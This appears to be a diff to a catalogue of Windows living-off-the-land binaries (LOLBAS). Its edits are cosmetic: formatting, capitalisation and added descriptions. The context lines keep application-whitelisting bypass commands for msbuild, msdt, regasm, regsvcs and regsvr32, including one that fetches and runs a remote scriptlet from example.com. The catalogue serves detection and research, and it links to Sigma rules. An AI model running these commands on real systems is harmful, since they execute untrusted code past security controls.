+++ b/yml/OSBinaries/Makecab.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Mavinject.yml
+++ b/yml/OSBinaries/Mavinject.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@gN3mes1s'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
+++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml
@ -56,4 +56,3 @@ Acknowledgement:
    Handle: '@FortyNorthSec'
  - Person: Bank Security
    Handle: '@Bank_Security'
 ---
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -22,7 +22,7 @@ Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
 Code_Sample:
- Code:
+  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_mmc_spawn_shell.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b731c2059445eef53e37232a5f3634c3473aae0c/rules/windows/file_event/sysmon_uac_bypass_dotnet_profiler.yml
@ -34,4 +34,3 @@ Acknowledgement:
    Handle: '@bohops'
  - Person: clem
    Handle: '@clavoillotte'
 ---
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -53,4 +53,3 @@ Acknowledgement:
    Handle: ''
  - Person: Cedric
    Handle: '@th3c3dr1c'
 ---
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -7,7 +7,7 @@ Commands:
  - Command: msbuild.exe pshell.xml
    Description: Build and execute a C# project stored in the target XML file.
    Usecase: Compile and run code
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1127.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -77,4 +77,3 @@ Acknowledgement:
    Handle: '@Cneelis'
  - Person: Jimmy
    Handle: '@bohops'
 ---
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
 ---
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -14,7 +14,7 @@ Commands:
  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
    Usecase: Execute code bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
 ---
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -69,4 +69,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -51,4 +51,3 @@ Acknowledgement:
    Handle: '@netbiosX'
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
 ---
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -34,4 +34,3 @@ Acknowledgement:
    Handle:
  - Person: 'Xabier Ugarte-Pedrero'
    Handle:
 ---
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -36,4 +36,3 @@ Acknowledgement:
    Handle: '@subtee'
  - Person: Adam
    Handle: '@Hexacorn'
 ---
--- a/yml/OSBinaries/OfflineScannerShell.yml
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@ -19,4 +19,3 @@ Detection:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
 ---
--- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@ -21,4 +21,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
 ---
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -38,4 +38,3 @@ Acknowledgement:
    Handle: '@kylehanslovan'
  - Person: Fab
    Handle: '@0rbz_'
 ---
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
 ---
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -31,4 +31,3 @@ Resources:
 Acknowledgement:
  - Person: Derek Johnson
    Handle: ''
 ---
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -22,4 +22,3 @@ Acknowledgement:
    Handle: '@LuxNoBulIshit'
  - Person: Avihay eldad
    Handle: '@aloneliassaf'
 ---
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -40,4 +40,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@ -28,4 +28,3 @@ Resources:
 Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
 ---
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Leon Rodenko
    Handle: '@L3m0nada'
 ---
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: FireEye
    Handle: '@FireEye'
 ---
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@ -41,4 +41,3 @@ Resources:
 Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'
 ---
--- a/yml/OSBinaries/Reg.yml
+++ b/yml/OSBinaries/Reg.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Regasm.yml
+++ b/yml/OSBinaries/Regasm.yml
@ -7,7 +7,7 @@ Commands:
  - Command: regasm.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute code and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Regedit.yml
+++ b/yml/OSBinaries/Regedit.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Regini.yml
+++ b/yml/OSBinaries/Regini.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Eli Salem
    Handle: '@elisalem9'
 ---
--- a/yml/OSBinaries/Register-cimprovider.yml
+++ b/yml/OSBinaries/Register-cimprovider.yml
@ -24,4 +24,3 @@ Resources:
 Acknowledgement:
  - Person: Philip Tsukerman
    Handle: '@PhilipTsukerman'
 ---
--- a/yml/OSBinaries/Regsvcs.yml
+++ b/yml/OSBinaries/Regsvcs.yml
@ -14,7 +14,7 @@ Commands:
  - Command: regsvcs.exe AllTheThingsx64.dll
    Description: Loads the target .DLL file and executes the RegisterClass function.
    Usecase: Execute dll file and bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: Local Admin
    MitreID: T1218.009
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Regsvr32.yml
+++ b/yml/OSBinaries/Regsvr32.yml
@ -7,14 +7,14 @@ Commands:
  - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
    Description: Execute the specified remote .SCT script with scrobj.dll.
    Usecase: Execute code from remote scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
    Description: Execute the specified local .SCT script with scrobj.dll.
    Usecase: Execute code from scriptlet, bypass Application whitelisting
-    Category: AWL bypass
+    Category: AWL Bypass
    Privileges: User
    MitreID: T1218.010
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -57,4 +57,3 @@ Resources:
 Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
 ---
--- a/yml/OSBinaries/Replace.yml
+++ b/yml/OSBinaries/Replace.yml
@ -32,4 +32,3 @@ Resources:
 Acknowledgement:
  - Person: elceef
    Handle: '@elceef'
 ---
--- a/yml/OSBinaries/Rpcping.yml
+++ b/yml/OSBinaries/Rpcping.yml
@ -39,4 +39,3 @@ Acknowledgement:
    Handle: '@splinter_code'
  - Person: ap
    Handle: '@decoder_it'
 ---
--- a/yml/OSBinaries/Rundll32.yml
+++ b/yml/OSBinaries/Rundll32.yml
@ -91,4 +91,3 @@ Acknowledgement:
    Handle: '@404death'
  - Person: Martin Ingesen
    Handle: '@Mrtn9'
 ---
--- a/yml/OSBinaries/Runonce.yml
+++ b/yml/OSBinaries/Runonce.yml
@ -1,6 +1,6 @@
 ---
 Name: Runonce.exe
-Description:
+Description: Executes a Run Once Task that has been configured in the registry
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -27,4 +27,3 @@ Resources:
 Acknowledgement:
  - Person: Pierre-Alexandre Braeken
    Handle: '@pabraeken'
 ---
--- a/yml/OSBinaries/Runscripthelper.yml
+++ b/yml/OSBinaries/Runscripthelper.yml
@ -1,6 +1,6 @@
 ---
 Name: Runscripthelper.exe
-Description:
+Description: Execute target PowerShell script
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -26,4 +26,3 @@ Resources:
 Acknowledgement:
  - Person: Matt Graeber
    Handle: '@mattifestation'
 ---
--- a/yml/OSBinaries/Sc.yml
+++ b/yml/OSBinaries/Sc.yml
@ -36,4 +36,3 @@ Resources:
 Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
 ---
--- a/yml/OSBinaries/Schtasks.yml
+++ b/yml/OSBinaries/Schtasks.yml
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person:
    Handle:
 ---
--- a/yml/OSBinaries/Scriptrunner.yml
+++ b/yml/OSBinaries/Scriptrunner.yml
@ -1,6 +1,6 @@
 ---
 Name: Scriptrunner.exe
-Description:
+Description: Execute binary through proxy binary to evade defensive counter measures
 Author: 'Oddvar Moe'
 Created: 2018-05-25
 Commands:
@ -33,4 +33,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@nicktyrer'
 ---
--- a/yml/OSBinaries/SettingSyncHost.yml
+++ b/yml/OSBinaries/SettingSyncHost.yml
@ -31,4 +31,3 @@ Acknowledgement:
    Handle: '@hexacorn'
  - Person: Elliot Killick
    Handle: '@elliotkillick'
 ---
--- a/yml/OSBinaries/Stordiag.yml
+++ b/yml/OSBinaries/Stordiag.yml
@ -22,4 +22,3 @@ Resources:
 Acknowledgement:
  - Person: Eral4m
    Handle: '@eral4m'
 ---
--- a/yml/OSBinaries/Syncappvpublishingserver.yml
+++ b/yml/OSBinaries/Syncappvpublishingserver.yml
@ -25,4 +25,3 @@ Resources:
 Acknowledgement:
  - Person: Nick Landers
    Handle: '@monoxgas'
 ---
--- a/yml/OSBinaries/Ttdinject.yml
+++ b/yml/OSBinaries/Ttdinject.yml
@ -35,4 +35,3 @@ Acknowledgement:
    Handle: '@oddvarmoe'
  - Person: Maxime Nadeau
    Handle: '@m_nad0'
 ---
--- a/yml/OSBinaries/Tttracer.yml
+++ b/yml/OSBinaries/Tttracer.yml
@ -37,4 +37,3 @@ Acknowledgement:
    Handle: '@oulusoyum'
  - Person: Matt Graeber
    Handle: '@mattifestation'
 ---
--- a/yml/OSBinaries/Vbc.yml
+++ b/yml/OSBinaries/Vbc.yml
@ -31,4 +31,3 @@ Acknowledgement:
    Handle:
  - Person: Hai Vaknin(Lux)
    Handle:
 ---
--- a/Show More
+++ b/Show More